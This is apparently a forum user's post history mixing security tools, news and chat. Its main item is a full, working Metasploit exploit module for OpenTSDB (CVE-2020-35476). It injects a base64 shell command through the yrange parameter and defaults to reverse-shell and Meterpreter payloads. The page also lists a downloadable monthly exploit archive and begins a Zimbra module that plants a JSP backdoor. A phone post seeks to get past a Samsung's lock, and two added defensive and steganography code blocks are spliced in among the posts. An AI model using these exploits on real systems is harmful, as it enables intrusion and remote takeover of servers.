Everything posted by Kev
-
modreveal

modreveal is a small utility that prints the names of hidden LKMs if any exist.

Usage

    make
    sudo ./modreveal

Notes

To test the utility, you can use the Diamorphine rootkit (https://github.com/m0nad/Diamorphine).

The author runs Arch Linux LTS kernel, so it is only guaranteed to work on Arch Linux LTS kernel. It will most likely work with your kernel too unless you are running something ancient or really new that breaks something.

Download: modreveal-master.zip or git clone https://github.com/jafarlihi/modreveal.git

Source
-
This Metasploit module exploits an unauthenticated command injection vulnerability in the yrange parameter in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution as the root user. The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.0 or lower, the module performs additional checks to obtain the configured metrics and aggregators. It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph. As part of this request, the yrange parameter is set to the payload, which will then be executed by the target if the latter is vulnerable. This module has been successfully tested against OpenTSDB version 2.3.0.

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      prepend Msf::Exploit::Remote::AutoCheck

      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'OpenTSDB 2.4.0 unauthenticated command injection',
            'Description' => %q{
              This module exploits an unauthenticated command injection
              vulnerability in the yrange parameter in OpenTSDB through
              2.4.0 (CVE-2020-35476) in order to achieve unauthenticated
              remote code execution as the root user.

              The module first attempts to obtain the OpenTSDB version via
              the api. If the version is 2.4.0 or lower, the module
              performs additional checks to obtain the configured metrics
              and aggregators. It then randomly selects one metric and one
              aggregator and uses those to instruct the target server to
              plot a graph. As part of this request, the yrange parameter is
              set to the payload, which will then be executed by the target
              if the latter is vulnerable.

              This module has been successfully tested against OpenTSDB
              version 2.3.0.
            },
            'License' => MSF_LICENSE,
            'Author' => [
              'Shai rod', # @nightrang3r - discovery and PoC
              'Erik Wynter' # @wyntererik - Metasploit
            ],
            'References' => [
              ['CVE', '2020-35476'],
              ['URL', 'https://github.com/OpenTSDB/opentsdb/issues/2051'] # disclosure and PoC
            ],
            'DefaultOptions' => {
              'RPORT' => 4242
            },
            'Platform' => %w[unix linux],
            'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
            'CmdStagerFlavor' => %w[bourne curl wget],
            'Targets' => [
              [
                'Automatic (Unix In-Memory)',
                {
                  'Platform' => 'unix',
                  'Arch' => ARCH_CMD,
                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
                  'Type' => :unix_memory
                }
              ],
              [
                'Automatic (Linux Dropper)',
                {
                  'Platform' => 'linux',
                  'Arch' => [ARCH_X86, ARCH_X64],
                  'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
                  'Type' => :linux_dropper
                }
              ]
            ],
            'Privileged' => true,
            'DisclosureDate' => '2020-11-18',
            'DefaultTarget' => 1,
            'Notes' => {
              'Stability' => [ CRASH_SAFE ],
              'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
              'Reliability' => [ REPEATABLE_SESSION ]
            }
          )
        )

        register_options [
          OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']),
        ]
      end

      def check
        # sanity check to see if the target is likely OpenTSDB
        res1 = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path)
        })

        unless res1
          return CheckCode::Unknown('Connection failed.')
        end

        unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenTSDB')
          return CheckCode::Safe('Target is not an OpenTSDB application.')
        end

        # get the version via the api
        res2 = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'api', 'version')
        })

        unless res2
          return CheckCode::Unknown('Connection failed.')
        end

        unless res2.code == 200 && res2.body.include?('version')
          return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.')
        end

        begin
          parsed_res_body = JSON.parse(res2.body)
        rescue JSON::ParserError
          return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')
        end

        unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version')
          return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')
        end

        version = parsed_res_body['version']

        begin
          if Rex::Version.new(version) <= Rex::Version.new('2.4.0')
            return CheckCode::Appears("The target is OpenTSDB version #{version}")
          else
            return CheckCode::Safe("The target is OpenTSDB version #{version}")
          end
        rescue ArgumentError => e
          return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")
        end
      end

      def select_metric
        # check if any metrics have been configured. if not, exploitation cannot work
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'suggest'),
          'vars_get' => { 'type' => 'metrics' }
        })

        unless res
          fail_with(Failure::Unknown, 'Connection failed.')
        end

        unless res.code == 200
          fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics")
        end

        begin
          metrics = JSON.parse(res.body)
        rescue JSON::ParserError
          fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.')
        end

        unless metrics.is_a?(Array)
          fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array')
        end

        if metrics.empty?
          fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible')
        end

        # select a random metric since any will do
        @metric = metrics.sample
        print_status("Identified #{metrics.length} configured metrics. Using metric #{@metric}")
      end

      def select_aggregator
        # check the configured aggregators and select one at random
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'aggregators')
        })

        unless res
          fail_with(Failure::Unknown, 'Connection failed.')
        end

        unless res.code == 200
          fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators")
        end

        begin
          aggregators = JSON.parse(res.body)
        rescue JSON::ParserError
          fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.')
        end

        unless aggregators.is_a?(Array)
          fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array')
        end

        if aggregators.empty?
          fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible')
        end

        # select a random aggregator since any will do
        @aggregator = aggregators.sample
        print_status("Identified #{aggregators.length} configured aggregators. Using aggregator #{@aggregator}")
      end

      def execute_command(cmd, _opts = {})
        # use base64 to avoid special char escape hell (specifying BadChars did not help)
        cmd = "'echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/sh'"
        start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data
        start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S')
        end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data
        end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S')

        get_vars = {
          'start' => start_value,
          'end' => end_value,
          'm' => "#{@aggregator}:#{@metric}",
          'yrange' => "[1:system(#{Rex::Text.uri_encode(cmd)})]",
          'wxh' => "#{rand(800..1600)}x#{rand(400..600)}",
          'style' => 'linespoint'
        }

        exploit_uri = '?'
        get_vars.each do |key, value|
          exploit_uri += "#{key}=#{value}&"
        end
        exploit_uri += 'json'

        # using a raw request because cgi was leading to encoding issues
        send_request_raw({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri)
        }, 0) # we don't have to wait for a reply here
      end

      def exploit
        select_metric
        select_aggregator
        if target.arch.first == ARCH_CMD
          print_status('Executing the payload')
          execute_command(payload.encoded)
        else
          execute_cmdstager(background: true)
        end
      end
    end

# 0day.today [2022-12-25] #

Source
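For defenders, the graph request described above leaves a recognizable trace: a GET to the `q` endpoint whose `yrange` value is not a plain numeric range. The following is an added example, not part of the original post or of Metasploit, that flags such requests in web access logs; the log format, the sample lines, the numeric-range allowlist and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: a legitimate yrange is a gnuplot-style range of optional numbers,
# such as [0:], [0:100] or [:]. Anything else is reported.
_NUM = r"[-+]?[0-9]*\.?[0-9]*(?:[eE][-+]?[0-9]+)?"
SAFE_YRANGE = re.compile(rf"\[{_NUM}:{_NUM}\]")

# Request line inside a combined-log-format entry: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')


def fully_unquote(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded values are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_safe_yrange(value):
    """True only for a bracketed range made of optional numbers."""
    return SAFE_YRANGE.fullmatch(value) is not None


def inspect_line(line):
    """Return a finding for one log line, or None if nothing is suspicious."""
    match = REQUEST.search(line)
    if not match:
        return None
    parts = urlsplit(match.group("target"))
    # Only the graph endpoint (".../q") takes the yrange parameter.
    if parts.path.rstrip("/").rsplit("/", 1)[-1] != "q":
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() != "yrange":
            continue
        decoded = fully_unquote(value)
        if not is_safe_yrange(decoded):
            return {"client": line.split(" ", 1)[0], "yrange": decoded}
    return None


def scan(lines):
    """Scan log lines and return findings with 1-based line numbers."""
    findings = []
    for number, line in enumerate(lines, start=1):
        finding = inspect_line(line)
        if finding:
            finding["line"] = number
            findings.append(finding)
    return findings


# Constructed sample log lines (documentation IP ranges, placeholder payloads).
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Dec/2022:10:01:12 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.user&yrange=[0:100]&wxh=900x400&json HTTP/1.1" 200 512',
    '203.0.113.9 - - [25/Dec/2022:10:02:40 +0000] "GET /q?start=2008/03/02-11:20:00&end=2029/01/01-00:00:00&m=avg:sys.cpu.user&yrange=[1:system(%27PLACEHOLDER%27)]&wxh=1200x500&style=linespoint&json HTTP/1.1" 200 0',
    '203.0.113.9 - - [25/Dec/2022:10:02:55 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.user&yrange=%255B1%253Asystem%2528PLACEHOLDER%2529%255D&json HTTP/1.1" 200 0',
    '198.51.100.7 - - [25/Dec/2022:10:03:01 +0000] "GET /api/version HTTP/1.1" 200 120',
    '198.51.100.7 - - [25/Dec/2022:10:03:09 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.user&yrange=[:]&json HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} sent yrange={hit['yrange']!r}")
```

The same allowlist can be enforced at a reverse proxy in front of OpenTSDB so that non-numeric `yrange` values never reach the graphing code.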
-
I agree with what M4T3! says, e.g.: these do not get you indexed: games0nline.ro jocurio#line.com. I can help you, send me a PM.
-
You can find it on GitHub. Good luck!
-
And what if it cites the source?
-
150 free crash courses from the best instructors on YouTube. Click on a topic to begin! 🚀 Skills: Python JavaScript Java PHP Ruby C# C++ Git CS Basics HTML & CSS WordPress Excel SQL APIs Databases AWS Linux Communication Career Tracks: Front-End Dev. Back-End Dev. Mobile Dev. DevOps Data Engineer Data Analyst Data Scientist UX Designer Product Manager Digital Marketer Source: hourups.com
-
This is exactly how it is with the big-shot "gangsters/trappers" who talk on the phone with stacks of $ bought on eBay, but in reality they are in a sorry state.
-
A vulnerability discovered in GitHub Actions could allow an attacker to poison a developer's pipeline, highlighting the risk that insecure software pipelines pose.

An attacker submitting changes to an open source repository on GitHub could cause downstream software projects that include the latest version of a component to compile updates with malicious code.

That's according to software supply chain security firm Legit Security, which said in an advisory published on Dec. 1 that this "artifact poisoning" weakness could affect software projects that use GitHub Actions — a service for automating development pipelines — by triggering the build process when a change is detected in a software dependency.

The vulnerability is not theoretical: Legit Security simulated an attack on the project that manages Rust, causing the project to recompile using a customized — and malicious — version of the popular GCC software library, the company stated in the advisory.

The problem likely affects a large number of open source projects because maintainers typically will run tests on contributed code before they actually analyze the code themselves, says Liav Caspi, chief technology officer of Legit Security.

"It is a common pattern today," he says. "A lot of open source projects today, upon a change request, they run a bunch of tests to validate the request because the maintainer does not want to have to review the code first. Instead, it automatically runs tests."

The attack takes advantage of the automated build process through GitHub Actions. In the case of the Rust programming language, the vulnerable pattern could have allowed an attacker to execute code in a privileged way as part of the development pipeline, stealing repository secrets and potentially tampering with code, Legit Security said.

"To put it simply: in a vulnerable workflow, any GitHub user can create a fork that builds an artifact," the company stated in its advisory. "Then inject this artifact into the original repository build process and modify its output. This is another form of a software supply chain attack, where the build output is modified by an attacker."

The vulnerability enables an attack similar to the malware-insertion attack that targeted CodeCov and, through that company's software, its downstream customers.

"[T]he lack of native GitHub implementation for cross-workflow artifacts communication led many projects and the GitHub Actions community to develop insecure solutions for cross-workflow communication and made this threat highly prevalent," Legit Security stated in the advisory.

GitHub confirmed the issue and paid a bounty for the information, while Rust fixed its vulnerable pipeline, Legit Security stated.

Software Supply Chain Needs Security

The vulnerability is the latest security issue to affect software supply chains. Industry and government agencies have increasingly sought to bolster the security of open source software and software provided as a service. In May 2021, for example, the Biden administration released its executive order on Improving the Nation's Cybersecurity, a federal rule that, among other requirements, mandates that the government will require baseline security standards for any software it purchases. On the private industry side, Google and Microsoft have pledged billions of dollars to shore up security in the open source ecosystem, which provides the code that comprises more than three-quarters of the average application's codebase.

Logical, But Vulnerable

The security issue belongs to a hard-to-find class of problems known as logic issues, which include issues with permissions, the potential for forked repositories to be inserted into a pipeline, and a lack of differentiation between forked and base repositories.

Because software projects often use automated scripts to check code submissions before forwarding them to the maintainers, pull requests will be run through automation before any human checks them for malicious code. While the automation saves time, it also should be considered a way for attackers to insert malicious code into the pipeline.

"When you are doing open source development, the problem is bigger, because you are accepting contribution from anyone in the world," Caspi says. "You are executing things that you cannot trust."

GitHub acknowledged the issue and expanded the ways of excluding submissions from outside collaborators from being automatically inserted into the Actions pipeline. The company updated its GetArtifact and ListArtifacts APIs with the goal of providing more information to help determine whether an artifact can be trusted.

"Anyone that does anything like the Rust project did — trusting the input from a third party — then they are still vulnerable," Caspi says. "It is a logic problem. GitHub just made it easier to write a safer script."

Via darkreading.com
-
This archive contains all of the 69 exploits added to Packet Storm in November, 2022.

Content:

    Directory of \2211-exploits

    12/03/2022 05:06 PM <DIR> .
    12/03/2022 05:06 PM <DIR> ..
    11/02/2022 05:06 PM 9,286 apache_couchdb_erlang_rce.rb.txt
    11/03/2022 02:29 PM 853 atg_client.py.txt
    11/11/2022 03:21 PM 608 avevaiaasg2020R2-traversal.txt
    11/21/2022 06:05 PM 2,412 boa09414-bypass.txt
    11/21/2022 06:16 PM 9,623 churchinfo_upload_exec.rb.txt
    11/15/2022 06:48 PM 7,019 ciscoseg-bypass.txt
    11/21/2022 05:08 PM 2,003 clicshopping3402-xss.txt
    11/29/2022 06:02 PM 11,611 concretecms913-xpath.txt
    11/11/2022 03:16 PM 1,948 cvat20-ssrf.txt
    11/21/2022 05:51 PM 72,940 CVE-2020-1493.tgz
    11/21/2022 05:57 PM 64,952 CVE-2020-16947.tgz
    11/30/2022 11:16 PM 348,622 CVE-2022-41412.tgz
    11/30/2022 11:16 PM 687,025 CVE-2022-41413.tgz
    11/24/2022 04:10 PM 4,299 ecommerce10-xssredirect.txt
    11/30/2022 10:52 PM 8,957 exchange_proxynotshell_rce.rb.txt
    11/24/2022 04:13 PM 5,064 f5_icontrol_rpmspec_rce_cve_2022_41800.rb.txt
    11/02/2022 05:04 PM 4,135 flir_ax8_unauth_rce_cve_2022_37061.rb.txt
    11/09/2022 03:16 PM 3,080 formaspotlms321-xss.txt
    11/17/2022 03:31 PM 8,294 gitea_git_fetch_rce.rb.txt
    11/04/2022 03:37 PM 50,046 GS20221104133541.txt
    11/07/2022 05:15 PM 24,039 GS20221107151324.tgz
    11/08/2022 03:54 PM 13,445 GS20221108135354.tgz
    11/10/2022 03:35 PM 6,982 GS20221110133351.tgz
    11/10/2022 03:41 PM 7,183 GS20221110133825.tgz
    11/10/2022 03:46 PM 6,668 GS20221110134348.tgz
    11/14/2022 06:50 PM 4,276 GS20221114164850.tgz
    11/14/2022 06:52 PM 4,745 GS20221114165129.txt
    11/14/2022 06:54 PM 4,696 GS20221114165410.tgz
    11/18/2022 04:17 PM 111,390 GS20221118141708.tgz
    11/18/2022 04:22 PM 11,505 GS20221118141944.tgz
    11/25/2022 05:50 PM 4,259 GS20221125155014.tgz
    11/25/2022 05:53 PM 3,717 GS20221125155355.tgz
    11/25/2022 05:58 PM 5,768 GS20221125155537.tgz
    11/30/2022 10:40 PM 5,509 hirschmannbatc2-exec.txt
    11/25/2022 06:03 PM 2,041 hss10-sql.txt
    11/16/2022 05:58 PM 2,847 idm641-execmitm.txt
    11/11/2022 03:14 PM 1,250 iotransfer4-unquotedpath.txt
    11/11/2022 03:23 PM 3,216 msnswitchmnt2408-exec.txt
    11/10/2022 03:43 PM 5,772 MVID-2022-0653.txt
    11/10/2022 03:37 PM 2,427 MVID-2022-0654.txt
    11/14/2022 06:47 PM 2,056 MVID-2022-0655.txt
    11/16/2022 06:02 PM 5,542 MVID-2022-0656.txt
    11/21/2022 05:06 PM 2,953 MVID-2022-0657.txt
    11/21/2022 05:19 PM 2,034 MVID-2022-0658.txt
    11/23/2022 05:16 PM 4,808 MVID-2022-0659.txt
    11/25/2022 06:11 PM 2,263 MVID-2022-0660.txt
    11/25/2022 06:05 PM 3,811 MVID-2022-0661.txt
    11/25/2022 06:09 PM 1,875 MVID-2022-0662.txt
    11/11/2022 03:13 PM 8,631 owa173-exec.txt
    11/30/2022 10:44 PM 10,167 OXUIB-1654.txt
    11/16/2022 06:13 PM 1,863 rcs10-sqlexec.py.txt
    11/16/2022 06:17 PM 1,969 rcs10-xssbypass.txt
    11/21/2022 06:10 PM 3,700 roxy-fileman_upload.py.txt
    11/15/2022 06:51 PM 14,981 SA-20221109-0.txt
    11/15/2022 06:55 PM 8,873 SA-20221110-0.txt
    11/15/2022 06:57 PM 8,165 SA-20221114-0.txt
    11/04/2022 03:34 PM 1,621 slms950-sql.txt
    11/11/2022 03:18 PM 1,462 smartrgsr510n2613-exec.txt
    11/25/2022 06:02 PM 1,724 smsphp10-sql.txt
    11/28/2022 05:49 PM 4,299 vbulletin552-exec.txt
    11/15/2022 06:42 PM 5,627 vmware_nsxmgr_xstream_rce_cve_2021_39144.rb.txt
    11/02/2022 05:02 PM 5,382 webmin_file_manager_rce.rb.txt
    11/15/2022 06:50 PM 3,306 wpbecustom1052-xsrf.txt
    11/21/2022 05:24 PM 4,907 wpbetheme26514-deserialize.txt
    11/09/2022 03:42 PM 7,879 wpblog2social6911-bypass.txt
    11/21/2022 05:31 PM 1,101 zteh108ns-bypass.txt
    11/21/2022 05:11 PM 1,563 zteh108ns-overflow.txt
    67 File(s) 1,657,074 bytes
    2 Dir(s) 2,291,347,456 bytes free

Download: 202211-exploits.tgz (1.4 MB)

Source
-
Listen to college radio stations

FAQ

I don’t see my college radio station. Can you add it?
Absolutely! It’s pretty easy for me to add new stations, and I’m always looking for new radio stations to listen to. Feel free to suggest stations via this form!

What does it mean if a station is grayed out?
If a station card is gray, that means the app is still loading its corresponding audio stream. It should be ready to play soon!

Why do the stations periodically turn gray?
In order to smoothly switch between streams, Campus FM keeps a small cache of audio data available for each station. After some time has passed, the cached audio gets stale and the app requests more recent content. The station is grayed out during this loading period.

I've been waiting for a while now, why isn't my station loading?
IT practices aren't consistent across all college radio stations. Sometimes they have security restrictions that prevent their audio streams from loading on certain apps and devices. And sometimes the audio streams just go offline for a while.

The app isn’t working on my device / I’ve spotted a bug / I’d like to see [insert feature here].
That’s awesome (or I’m sorry)! I’m still learning how to build web apps and I would love your feedback! If you have a GitHub account, you can open an issue directly on the Campus FM repo, or you can get in touch with me at hello.campusfm@gmail.com

Can I get Campus FM on my phone/tablet?
I’m working on native apps for iOS and Android!

URL: https://www.campus-fm.com

Source: github.com
-
Feep! search (alpha) About Feep! search is a web search engine, focused on programming resources. It uses an independent index, currently totalling a bit over 29 million pages. (That’s slightly more than Google’s first index in 1998!) Result quality is rather variable, mainly because I haven’t tuned the ranking very well yet. See about Feep! search for more information. URL: https://search.feep.dev Source: github.com
-
I'm not being lazy; most of them come up as PUA/Generic etc... 7/36 on VirusTotal. Edit: I don't understand how it sends a confirmation SMS, since it has neither a SIM nor WiFi, and the programs mentioned ^ don't solve anything. I managed to get into it through Smart Switch.
-
@mannnu in the first video the Indian guy asks for 2k, 3k, more than the phone is worth; I use it for personal use. The second video doesn't interest me; I want it as it came from the factory, and if not, I'll hand it in. Thanks anyway.
-
Hi. I received a phone as a gift from an old lady, a Samsung Grand Prime (I don't know the model). I can't access the menu; I tried a Hard Reset, nothing; I tried software tools, but all of them come up as PUA/Generic etc... How can I bring it back to its factory state? She is asleep when I call her to send me the G-xxx; I tried for hours. Edit/ Model: Samsung sm-g531f Edit// I also tried Odin, I can't find the firmware, the old lady doesn't know the e-mail password, I'm trying to flash it. Thanks
-
Simple C++ Encryption and Steganography tool that uses Password-Protected-Encryption to secure a file's contents, and then proceeds to embed it inside an image's pixel-data using Least-Significant-Bit encoding. For Linux based systems.

Encoding:

    $ ./steganography encode -i data/orig.png -e data/jekyll_and_hyde.zip -o output.png
    Password: 1234
    * Image size: 640x426 pixels
    * Encoding level: Low (Default)
    * Max embed size: 132.38 KiB
    * Embed size: 61.77 KiB
    * Encrypted embed size: 61.78 KiB
    * Generated CRC32 checksum
    * Generated encryption key with PBKDF2-HMAC-SHA-256 (20000 rounds)
    * Encrypted embed with AES-256-CBC
    * Embedded jekyll_and_hyde.zip into image
    * Sucessfully wrote to output.png

Original image:

Image with embedded ZIP containing the entire contents of the book "Dr Jekyll and Mr Hyde":

Decoding:

    $ ./steganography decode -i output.png -o "out - jekyll_and_hyde.zip"
    Password: 1234
    * Image size: 640x426 pixels
    * Generated decryption key with PBKDF2-HMAC-SHA-256 (20000 rounds)
    * Sucessfully decrypted header
    * File signatures match
    * Detected embed jekyll_and_hyde.zip
    * Encoding level: Low (Default)
    * Encrypted embed size: 61.78 KiB
    * Successfully decrypted the embed
    * Decrypted embed size: 61.77 KiB
    * CRC32 checksum matches
    * Successfully wrote to out - jekyll_and_hyde.zip

Building:

    $ mkdir build
    $ cd build
    $ cmake -DCMAKE_BUILD_TYPE=Release ..
    $ make -j 4

Usage:

    Usage: steganography [-h] {decode,encode}

    Optional arguments:
      -h, --help     shows help message and exits
      -v, --version  prints version information and exits

    Subcommands:
      decode  Decodes and extracts an embed-file from an image
      encode  Encodes an embed-file into an image

Encoding:

    Usage: encode [-h] --input VAR --output VAR --embed VAR [--passwd VAR]

    Encodes an embed-file into an image

    Optional arguments:
      -h, --help     shows help message and exits
      -v, --version  prints version information and exits
      -i, --input    specify the input image. [required]
      -o, --output   specify the output image. [required]
      -e, --embed    specify the file to embed. [required]
      -p, --passwd   specify the encryption password.

Decoding:

    Usage: decode [-h] --input VAR [--output VAR] [--passwd VAR]

    Decodes and extracts an embed-file from an image

    Optional arguments:
      -h, --help     shows help message and exits
      -v, --version  prints version information and exits
      -i, --input    specify the input image. [required]
      -o, --output   specify the output file. [default: ""]
      -p, --passwd   specify the encryption password.

Theory Of Operation

Encoding

The program operates by first randomly generating a 128-bit Password Salt and a 128-bit AES Initialization Vector by reading binary data from /dev/urandom. It then uses that Password Salt as a parameter in generating an encryption key, by using PBKDF2-HMAC-SHA-256 on a user inputted string.

A CRC32 hash of the file to embed is then calculated, and stored in the header to act as a checksum for the validity of the data. It then pads the binary data of the file to embed using the PKCS #7 algorithm, followed by actually encrypting both the header and the padded data, with AES-256 in CBC Mode, using the previously generated Initialization Vector.

Now the data is actually encoded inside the image by first picking a random offset, and then going through each bit of data and storing it inside the actual image pixel data, which it accomplishes by setting the Least-Significant-Bit of each channel byte of each pixel.

Decoding

The decoding process works exactly the same as the encoding process previously described above, just in reverse. The only difference is that for decoding, after the program attempts to extract and decrypt the data, it compares some of the information in the header section in an attempt to validate the extraction process.

The header fields which are compared are: The 4 byte file signature custom to this program, and the CRC32 hash of the decrypted data. If any of these fields do not match to their correct values, the decryption process will fail. This should only happen if the file which you were attempting to decrypt does not actually contain an embed, if the password you entered is wrong, or if the image file was somehow corrupted.

Detection

While the detection of data being embedded in an image is a trivial task, theoretically there is no way of knowing that it was this program that did it, and theoretically there should be no known way to decrypt the data without knowing the password, that is without spending millions of years in the process of doing so.

Disclaimer

Do not use this program to encrypt and hide important data which you wish to keep away from prying eyes. This is just a simple proof-of-concept program that I made for fun. I'm no cryptographer. I'm just a hobbyist, use at your own risk.

Copyright

This software is licensed under MIT. Copyright © 2022 Zach Collins

Download: steganography-main.zip or git clone https://github.com/7thSamurai/steganography.git

Source
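The embedding and validation steps from Theory Of Operation, as an added example that is not the tool's own code: a header plus payload is written into the least-significant bit of each channel byte, and extraction fails when the signature or CRC32 does not match. The header layout, the `STEG` signature value, passing the offset as an argument and all function names are assumptions for illustration, and the PBKDF2/AES-256-CBC step is left out.

```python
import struct
import zlib

# Assumed header: 4-byte signature, payload length, CRC32 of the payload.
# The tool's real signature and field order are not given on the page.
SIGNATURE = b"STEG"
HEADER = struct.Struct(">4sII")


def capacity_bytes(pixels, offset=0):
    """Payload bytes that fit at one bit per channel byte, after the header."""
    return (len(pixels) - offset) // 8 - HEADER.size


def _bits(data):
    """Yield the bits of data, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def _read(pixels, start, nbytes):
    """Rebuild nbytes from the LSBs of pixels[start : start + 8 * nbytes]."""
    out = bytearray()
    for index in range(nbytes):
        value = 0
        for bit in range(8):
            value = (value << 1) | (pixels[start + index * 8 + bit] & 1)
        out.append(value)
    return bytes(out)


def embed(pixels, payload, offset=0):
    """Return a copy of pixels with header + payload stored in the LSBs."""
    if len(payload) > capacity_bytes(pixels, offset):
        raise ValueError("payload does not fit in the image")
    blob = HEADER.pack(SIGNATURE, len(payload), zlib.crc32(payload)) + payload
    out = bytearray(pixels)
    for index, bit in enumerate(_bits(blob)):
        out[offset + index] = (out[offset + index] & 0xFE) | bit
    return out


def extract(pixels, offset=0):
    """Recover the payload, validating signature, length and CRC32."""
    if len(pixels) - offset < HEADER.size * 8:
        raise ValueError("image too small to hold a header")
    signature, length, crc = HEADER.unpack(_read(pixels, offset, HEADER.size))
    if signature != SIGNATURE:
        raise ValueError("signature mismatch: no embed at this offset")
    if length > capacity_bytes(pixels, offset):
        raise ValueError("corrupt header: length exceeds capacity")
    payload = _read(pixels, offset + HEADER.size * 8, length)
    if zlib.crc32(payload) != crc:
        raise ValueError("CRC32 mismatch: embedded data is corrupted")
    return payload


# Constructed 64x64 RGBA cover buffer standing in for decoded pixel data.
COVER = bytes((i * 37) % 256 for i in range(64 * 64 * 4))
SECRET = b"constructed sample payload"

if __name__ == "__main__":
    stego = embed(COVER, SECRET, offset=128)
    changed = sum(a != b for a, b in zip(COVER, stego))
    print(f"capacity: {capacity_bytes(COVER, 128)} bytes, bytes changed: {changed}")
    print(extract(stego, offset=128))
```

Every modified channel byte changes by at most 1, which is why the result looks identical to the original image while the LSB plane itself no longer looks like natural image data.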
-
Project two years in the making aims to improve public services... or what's left of them

It's pork barrel time again. The UK government has named a slew of tech organizations that made it onto a £2 billion framework agreement that allows them to compete for big data and analytics public sector contracts.

The Cabinet Office-run Crown Commercial Service (CCS), which sets up procurement on behalf of government ministries and other public sector organizations, ran the process and awarded contracts to many of the usual suspects and some lesser known entities (see box).

According to the contract award notice, the government sees big data and analytics as an emerging and evolving capability, "with its prominence heightened by COVID."

It claims the technology is "fast becoming recognised as business critical and a core business function, with many government departments now including chief data officers."

The notice says the procurement is required in part to support the National Data Strategy, a set of proposals for post-Brexit legislation which include changes to the remit of the Information Commissioners Office, the data privacy watchdog.

The procurement notice said the contracted suppliers, which are set to vie for business on framework, could help with the implementation of the government's "missions to reinforce the requirement to access and interrogate Government data more effectively to improve public services."

The government has taken more than a year to select the winning suppliers. It first announced plans to create the framework deal — a means of offering suppliers an indicative spending figure in exchange for structured pricing and preparedness for the work — in September last year, with a contract notice launching the competition following in November.

The framework is divided into two lots. The first looks for suppliers to design, build, and run professional services; the second is for commercial off-the-shelf software.

Launched in December 2020 by minister Oliver Dowden, the National Data Strategy talks of a "pro-growth and trusted data regime" that can transform the government's use of data and drive efficiency and so on.

"Data is a non-depletable resource in theory, but its use is limited by barriers to its access – such as when data is hoarded, when access rights are unclear or when organisations do not make good use of the data they already have. These barriers undermine the performance of public services and our economy, risking poorer outcomes for citizens. We will ensure that data can be leveraged to deliver new and innovative services, promote stronger competition, and better prices and choice for consumers and small businesses," promised Dowden at the launch of the consultation. ®

Via theregister.com
-
Have a go at def.camp; there are a multitude of challenges here.
-
This Metasploit module creates a .tar file that can be emailed to a Zimbra server to exploit CVE-2022-41352. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in the cpio command-line utility that can extract an arbitrary file to an arbitrary location on a Linux system (CVE-2015-1197). Most Linux distros have chosen not to fix it. This issue is exploitable on Red Hat-based systems (and other hosts without pax installed) running versions Zimbra Collaboration Suite 9.0.0 Patch 26 and below and Zimbra Collaboration Suite 8.8.15 Patch 33 and below.

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::FILEFORMAT
      include Msf::Exploit::EXE
      include Msf::Exploit::Remote::HttpClient
